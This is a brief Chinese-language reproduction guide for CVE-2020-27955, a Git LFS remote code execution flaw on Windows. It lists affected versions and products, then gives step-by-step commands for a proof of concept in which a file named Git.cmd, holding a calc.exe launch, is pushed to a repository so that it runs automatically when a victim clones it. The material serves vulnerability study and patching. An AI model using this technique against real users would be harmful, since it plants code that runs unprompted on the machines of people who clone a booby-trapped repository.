Git-LFS RCE(cve-2020-27955)
0x00 简介
Git LFS 是 GitHub 开发的一个 Git 的扩展, 用于实现 Git 对大文件的支持
0x01 影响版本
Git-LFS(Git-lfs)<= 2.12
一些受影响的产品包括 Git,GitHub CLI,GitHub Desktop,Visual Studio,GitKraden,SmartGit,Sourcetree 等
该漏洞影响仅 Windows 平台
0x02 复现过程
环境搭建
? 下载安装 Git-lfs 小于 2.12 的版本
? (该 poc 需在单独的 Linux 系统上 (以防止在提交时在 localhost 上执行))
? 只需添加名为以下文件的可执行文件, 即可在恶意仓库的根目录中创建后门:
- Git.bat
- Git.exe
- Git.cmd
- Git.vbs
复现过程
? 1 创建一个 Git 仓库
clone 到本地并将可执行文件添加到仓库,
在目标机器上进行 Git clone, 此时, 恶意文件将会下载到本地, 并由 Git-lfs 扩展自动执行, 无需交互
相关命令
- Git clone https://github.com/attacker/poc.git
- echo calc.exe> Git.cmd
- Git lfs track "*.dat"
- echo "test"> large.dat
- Git add -A
- Git commit -m "poc"
- Git push -u origin master -f
0x03 漏洞修复
更新到最新版软件
0x04 参看链接
来源: http://www.bubuko.com/infodetail-3712932.html